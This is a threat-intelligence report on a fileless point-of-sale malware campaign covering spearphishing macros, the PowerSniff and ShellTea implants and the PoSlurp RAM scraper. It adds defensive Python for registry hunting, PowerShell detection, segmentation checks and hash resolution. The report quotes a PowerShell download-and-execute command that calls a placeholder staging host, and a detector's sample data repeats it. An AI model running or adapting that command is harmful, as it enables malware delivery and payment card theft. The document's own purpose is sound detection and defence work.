Retail Point-of-Sale (PoS) systems remain a top target for the financially motivated hacker. Theft of payment card data in large volume exists not only as its own segment within financial crime, but also serves to facilitate other, even more harmful motives of today’s criminal elements. To the businesses targeted by cyber criminals, the negative effects are far reaching, with impact on brand reputation, consumer and investor confidence, and business growth strategies. With such a lucrative target as payment card data, adversary groups continue to adapt their Tactics, Techniques, and Procedures (TTPs) in response to defenders’ changes in security practices. One effective attacker TTP is to use so-called “fileless,” or memory-resident, malware to carry out attacks against retailer PoS systems.
root9B discovered an advanced, targeted PoS intrusion focused on harvesting payment card information for exfiltration. The adversary’s campaign has active and operational Command and Control (C2) servers. root9B’s analysis determined that the adversary is using advanced memory-resident techniques to maintain persistence and avoid detection. The malware likely required a significant amount of time and knowledge to create. We typically see techniques at this level by well-resourced, well-funded, motivated adversaries.
This ongoing campaign has targeted numerous organizations and their PoS systems. root9B uncovered the TTPs utilized and describes them in a detailed analysis below. At a high-level, the adversary’s methodology consists of the following steps:
- Step 1: Reconnaissance and targeting of a corporate individual with a spearphishing email attack employing an ActiveMIME document that carries an MS Office macro.
- Step 2: Email recipient opens the ActiveMIME document attachment and clicks to enable content, executing a PowerShell command initiating a surreptitious shellcode download.
- Step 3: A shellcode blob encapsulating a malicious Dynamic Link Library (DLL) is dropped in the system registry and loaded into memory, where it conducts basic enumeration and sandbox detection on the target. This malware appears to be an updated version of “PowerSniff.”
- Step 4: The malware continues reconnaissance of the target environment and contacts one of its five C2 domains with the results. If the environment meets the conditions the attacker is looking for, the attacker sends additional instructions.
- Step 5: The attackers install a second fileless implant in another registry shellcode blob. This implant, which we have named ShellTea, has not been previously observed or reported. We have identified six hardcoded C2 domains utilized by this implant.
- Step 6: The attacker explores the network using compromised privileged credentials and establishes persistent staging servers for deploying malware and collecting data from PoS endpoints. Several staging servers are utilized by the attackers to spread the workload and provide redundancy to thwart defensive measures.
- Step 7: An advanced PoS RAM-scraping malware, which we have named PoSlurp, is deployed to the PoS endpoints. PoSlurp directly injects memory-resident code into a privileged user-mode process. This capability has not been previously reported. The attacker can specify which PoS processes should be monitored for payment card transactions.
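Steps 3 and 5 describe implants that live as shellcode blobs inside registry values rather than as files on disk, so a hunt for them has to look at registry data itself. As an added hunting example that is not part of root9B’s report, the Python below parses a reg export and flags REG_BINARY values that are both large and high-entropy, or that carry a PE/DOS-stub header. The hive path, value names and the pseudo-random blob are constructed, and the size and entropy thresholds are assumptions to tune against a known-good PoS build.

```python
import math
import random

def shannon_entropy(data: bytes) -> float:
    """Bits per byte; packed or encrypted shellcode sits close to 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def _hex_to_bytes(s: str) -> bytes:
    return bytes(int(h, 16) for h in s.replace(" ", "").split(",") if h)

def parse_reg_export(text: str):
    """Yield (key, value_name, data) for every REG_BINARY ("hex:") value in a
    reg export. Long values continue on following lines that end in a backslash."""
    key, pending = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if pending is not None:
            name, frags = pending
            frags.append(line.rstrip("\\"))
            if not line.endswith("\\"):
                pending = None
                yield key, name, _hex_to_bytes("".join(frags))
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif line.startswith('"') and "=hex:" in line:
            name, _, rest = line.partition("=hex:")
            frags = [rest.rstrip("\\")]
            if rest.endswith("\\"):
                pending = (name.strip('"'), frags)
            else:
                yield key, name.strip('"'), _hex_to_bytes("".join(frags))

def hunt(text: str, min_size: int = 4096, min_entropy: float = 6.5):
    """Return (key, value_name, size, reasons) for values worth a closer look."""
    findings = []
    for key, name, data in parse_reg_export(text):
        reasons = []
        if len(data) >= min_size and shannon_entropy(data) >= min_entropy:
            reasons.append("large high-entropy blob")
        # "MZ" alone is too short to search for inside random data; require it at
        # offset 0 or the DOS stub string anywhere.
        if data.startswith(b"MZ") or b"This program cannot be run in DOS mode" in data:
            reasons.append("embedded PE header")
        if reasons:
            findings.append((key, name, len(data), reasons))
    return findings

def _to_reg_hex(data: bytes, width: int = 25) -> str:
    """Format bytes the way reg export does: comma-separated hex, wrapped with backslashes."""
    pairs = [f"{b:02x}" for b in data]
    rows = [",".join(pairs[i:i + width]) for i in range(0, len(pairs), width)]
    return ",\\\n  ".join(rows)

# Constructed sample export (assumption): one small benign value and one
# 8 KB pseudo-random blob carrying a DOS stub, standing in for an implant.
_rng = random.Random(1)
SAMPLE_BLOB = (b"MZ\x90\x00" + b"This program cannot be run in DOS mode"
               + bytes(_rng.getrandbits(8) for _ in range(8192)))
SAMPLE_EXPORT = (
    "Windows Registry Editor Version 5.00\n\n"
    "[HKEY_CURRENT_USER\\Software\\ConstructedVendor]\n"
    '"Theme"=hex:01,00,00,00\n'
    f'"Cache"=hex:{_to_reg_hex(SAMPLE_BLOB)}\n'
)

if __name__ == "__main__":
    for key, name, size, reasons in hunt(SAMPLE_EXPORT):
        print(f"{key}\\{name}: {size} bytes: {', '.join(reasons)}")
```

Run it against `reg export HKCU out.reg` (and the HKLM hives) taken from a suspect host; on a standardized PoS image the set of large binary values should be small and stable, so anything new that trips either check deserves a memory-dump follow-up.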
root9B has been able to deconstruct the four major components of the adversary’s activities. Provided here is a detailed analysis of the initial access method, the command-and-control methods, the new ShellTea implant, and the PoSlurp PoS RAM scraper.
Initial execution of the attack begins with a customized email to a targeted entity with a malicious macro-enabled ActiveMIME Office document attached. Once the targeted victim opens the attached document and clicks to enable macros, the macro quietly launches a PowerShell command that downloads another PowerShell stage from a staging site (often a public paste site) into memory and executes it. Seen in the command line below is the command (iex) that executes the downloaded payload in memory, after determining whether a 32-bit or 64-bit payload is required ([IntPtr]::Size -eq 4). This technique maintains a fileless footprint on
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient).DownloadString('https://<STAGING SITE>') | iex} else {(new-object Net.WebClient).DownloadString('https://<STAGING SITE>')}
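The launcher above leaves a recognizable process-creation record: an Office application spawning powershell.exe with ExecutionPolicy Bypass, a hidden window, a DownloadString call piped to iex, and the [IntPtr]::Size architecture probe. As an added detection example that is not part of root9B’s report, the Python below scores such records (the shape of Sysmon event 1 or Security event 4688) against those indicators. The sample events, the indicator weights and the alert threshold are constructed assumptions, and the staging URL is a placeholder.

```python
import re

# Constructed sample process-creation records (not from the report):
# (parent image, child image, command line). The first mirrors the launcher
# described in the text with the staging site replaced by a placeholder.
SAMPLE_EVENTS = [
    ("C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit "
     "-c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient)"
     ".DownloadString('https://STAGING-SITE-PLACEHOLDER/a') | iex} "
     "else {(new-object Net.WebClient).DownloadString('https://STAGING-SITE-PLACEHOLDER/b') | iex}"),
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -NoProfile -File C:\\scripts\\inventory.ps1"),
    ("C:\\Windows\\System32\\svchost.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\patch.ps1"),
]

# Office parents that should essentially never spawn PowerShell on a PoS or user host.
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

# (indicator name, case-insensitive regex, weight). Weights are our own choice.
INDICATORS = [
    ("exec_policy_bypass", r"-executionpolicy\s+bypass", 1),
    ("hidden_window",      r"-windowstyle\s+hidden", 2),
    ("noprofile",          r"-nop(rofile)?\b", 1),
    ("download_string",    r"\.downloadstring\(", 3),
    ("invoke_expression",  r"(\biex\b|invoke-expression)", 3),
    ("arch_probe",         r"\[intptr\]::size\s+-eq\s+4", 2),
]

def score_command(parent: str, cmdline: str):
    """Return (score, matched indicator names) for one process-creation event."""
    cl = cmdline.lower()
    hits = [name for name, rx, _ in INDICATORS if re.search(rx, cl)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    if parent.lower().rsplit("\\", 1)[-1] in OFFICE_PARENTS:
        hits.append("office_parent")
        score += 4
    return score, hits

def find_suspicious(events, threshold: int = 8):
    """Return powershell.exe launches whose score reaches the threshold, highest first."""
    out = []
    for parent, child, cmdline in events:
        if not child.lower().endswith("powershell.exe"):
            continue
        score, hits = score_command(parent, cmdline)
        if score >= threshold:
            out.append({"score": score, "indicators": hits, "cmdline": cmdline})
    return sorted(out, key=lambda r: r["score"], reverse=True)

if __name__ == "__main__":
    for r in find_suspicious(SAMPLE_EVENTS):
        print(r["score"], r["indicators"])
```

The two benign records (an admin script run with -NoProfile, and a patch script launched with ExecutionPolicy Bypass) score 1 each and stay under the threshold; only the Office-spawned downloader crosses it. The Office-parent rule carries the most weight on purpose, since on a standardized PoS host that parent/child pair alone is worth a ticket.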
- Apply macro restrictions in your environment to prevent users from inadvertently running malicious Office macros to help address this common initial access vector. For details, see: https://blogs.technet.com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/
- Limit the exposure of privileged administrator credentials by following best practices such as the PAW model, audit your credential risks, and require multifactor authentication for privileged users. For details, see: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/privileged-access-workstations
- Implement application whitelisting on PoS systems utilizing Microsoft’s built-in AppLocker or one of many commercial solutions. Much like the previous mitigation recommendation, PoS systems should be highly standardized and have no software running or installed that isn’t part of required functionality. Audit application execution in a development environment to build an effective yet minimal whitelist.
- Develop and maintain a robust security monitoring program or contract an experienced security Tune your environment to collect relevant network and endpoint-based artifacts that allow you to detect adversary actions. Focus your analysis on critical network segments and employ active defense methodologies (HUNT) to proactively identify persistent threats.
- Create a whitelist or greylist of domains and IP addresses that your organization is allowed to reach via the network.
- Implement effective network segmentation controls. Prohibiting communication between distinct segments such as PoS and Store networks, except for required ports and protocols, and using different credentials in each network will greatly delay if not eliminate the attacker’s ability to traverse the Communication between systems in these critical networks should be far more predictable than the corporate network, enabling a security monitoring program to more easily identify abnormal activity.
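The last two recommendations (a destination allowlist and strict PoS/Store/Corporate segmentation) become testable once written as a policy that flow records can be checked against. As an added example that is not part of root9B’s report, the Python below encodes such a policy and evaluates constructed flow records against it: PoS hosts may reach only a single payment gateway over one port, may never reach the internet directly, and corporate hosts reaching an unlisted external name produce an alert rather than a silent allow. The subnets, the gateway address, the allowlisted domain and the sample flows are all constructed assumptions.

```python
import ipaddress

# Constructed segment plan (assumption, not the report's or any real retailer's).
SEGMENTS = {
    "pos":   ipaddress.ip_network("10.10.0.0/16"),
    "store": ipaddress.ip_network("10.20.0.0/16"),
    "corp":  ipaddress.ip_network("10.30.0.0/16"),
}

# Cross-segment services that are required: (src_segment, dst_segment, proto, port).
ALLOWED_INTERNAL = {
    ("pos", "store", "tcp", 443),
    ("store", "corp", "tcp", 443),
}
# The only host in the Store segment a PoS terminal may talk to (assumption).
PAYMENT_GATEWAY = ipaddress.ip_address("10.20.0.10")

# Outbound allowlist of external destinations by DNS name (constructed).
ALLOWED_EXTERNAL_DOMAINS = {"updates.example-pos-vendor.invalid"}

def segment_of(ip) -> str:
    ip = ipaddress.ip_address(ip)
    for name, net in SEGMENTS.items():
        if ip in net:
            return name
    return "external"

def evaluate_flow(flow):
    """Return (verdict, reason) for a flow dict with keys src, dst, proto, port
    and an optional dst_name (the resolved name seen in DNS/proxy logs)."""
    src_seg, dst_seg = segment_of(flow["src"]), segment_of(flow["dst"])
    if src_seg == "external":
        return ("deny", "inbound from external")
    if dst_seg == "external":
        name = flow.get("dst_name")
        if src_seg == "pos":
            return ("deny", "PoS segment may not reach the internet")
        if name in ALLOWED_EXTERNAL_DOMAINS:
            return ("allow", "allowlisted domain")
        return ("alert", f"unlisted external destination {name or flow['dst']}")
    if src_seg == dst_seg:
        return ("allow", "intra-segment")
    rule = (src_seg, dst_seg, flow["proto"], flow["port"])
    if rule in ALLOWED_INTERNAL:
        if src_seg == "pos" and ipaddress.ip_address(flow["dst"]) != PAYMENT_GATEWAY:
            return ("deny", "PoS may reach only the payment gateway")
        return ("allow", "permitted cross-segment service")
    return ("deny", f"{src_seg}->{dst_seg} {flow['proto']}/{flow['port']} not permitted")

# Constructed flow records; the external name is a placeholder, not a real C2 domain.
SAMPLE_FLOWS = [
    {"src": "10.10.5.21", "dst": "10.20.0.10", "proto": "tcp", "port": 443},
    {"src": "10.10.5.21", "dst": "10.20.0.55", "proto": "tcp", "port": 443},
    {"src": "10.10.5.21", "dst": "10.30.1.4", "proto": "tcp", "port": 445},
    {"src": "10.30.1.4", "dst": "10.10.5.21", "proto": "tcp", "port": 445},
    {"src": "10.10.5.21", "dst": "203.0.113.9", "proto": "tcp", "port": 443,
     "dst_name": "unlisted-placeholder.invalid"},
    {"src": "10.30.1.4", "dst": "203.0.113.9", "proto": "tcp", "port": 443,
     "dst_name": "unlisted-placeholder.invalid"},
    {"src": "10.30.1.4", "dst": "198.51.100.7", "proto": "tcp", "port": 443,
     "dst_name": "updates.example-pos-vendor.invalid"},
]

def summarize(flows):
    """Count verdicts over a batch of flows; useful as a daily sanity check."""
    counts = {"allow": 0, "deny": 0, "alert": 0}
    for f in flows:
        counts[evaluate_flow(f)[0]] += 1
    return counts

if __name__ == "__main__":
    for f in SAMPLE_FLOWS:
        print(f["src"], "->", f.get("dst_name", f["dst"]), evaluate_flow(f))
```

Every "deny" here corresponds to a hop the report’s attacker relied on: corporate-to-PoS lateral movement over SMB, PoS-to-corporate staging traffic, and PoS endpoints talking straight to the internet. Feeding real flow or firewall logs through the same evaluator turns the segmentation design into a continuous check rather than a one-time configuration.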
INDICATORS OF COMPROMISE (IOCs)
POWERSNIFF C2 DOMAINS
SHELLTEA C2 DOMAINS
Function Hash Resolution Tool, IDA Script, and Process Name CRC32 Code: https://gist.github.com/root9b/24b9b25f3b0b06a6939881e68d0bd2d0
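The gist linked above is root9B’s own tooling. As an added example in the same spirit, but not taken from that gist or the report, the Python below resolves CRC32 process-name hashes of the kind a RAM scraper carries (Step 7 notes that the attacker specifies which PoS processes to monitor) back to names. Because the exact string form the malware hashed is not known, it tries each candidate in lower and upper case, with and without the .exe extension, and as both ASCII and UTF-16LE, and reports which form matched. The candidate list and the sample hashes are constructed; on a real case the candidates would come from a tasklist of a known-good PoS build.

```python
import zlib

# Constructed candidate process names (assumption, not from the report).
CANDIDATES = [
    "explorer.exe", "svchost.exe", "pos.exe", "posclient.exe", "cashier.exe",
    "retailterminal.exe", "epos.exe", "paymentsvc.exe", "notepad.exe",
]

# String encodings the hash may have been computed over (assumption).
ENCODINGS = ("ascii", "utf-16-le")

def crc32_of(text: str, encoding: str = "ascii") -> int:
    """Standard CRC32 (IEEE, as zlib computes it) over the encoded name."""
    return zlib.crc32(text.encode(encoding)) & 0xFFFFFFFF

def name_variants(name: str):
    """Case and extension forms a hash might have been computed over."""
    stem = name[:-4] if name.lower().endswith(".exe") else name
    for base in (name, stem):
        yield base.lower()
        yield base.upper()

def build_lookup(candidates):
    """Map hash -> (name form, encoding); first form wins on a collision."""
    table = {}
    for c in candidates:
        for v in name_variants(c):
            for enc in ENCODINGS:
                table.setdefault(crc32_of(v, enc), (v, enc))
    return table

def resolve(hashes, candidates=CANDIDATES):
    """Return {hash: (name, encoding) or None} for each hash."""
    table = build_lookup(candidates)
    return {h: table.get(h) for h in hashes}

# Constructed sample: two hashes computed here from chosen forms, plus one
# value that matches nothing in the candidate list.
SAMPLE_HASHES = [crc32_of("pos.exe"), crc32_of("CASHIER", "utf-16-le"), 0xDEADBEEF]

if __name__ == "__main__":
    for h, hit in resolve(SAMPLE_HASHES).items():
        print(f"{h:08x}: {hit if hit else 'unresolved'}")
```

A hash that stays unresolved is itself a lead: it usually means the candidate list is missing the vendor’s actual PoS binary name, which the PoS team can supply.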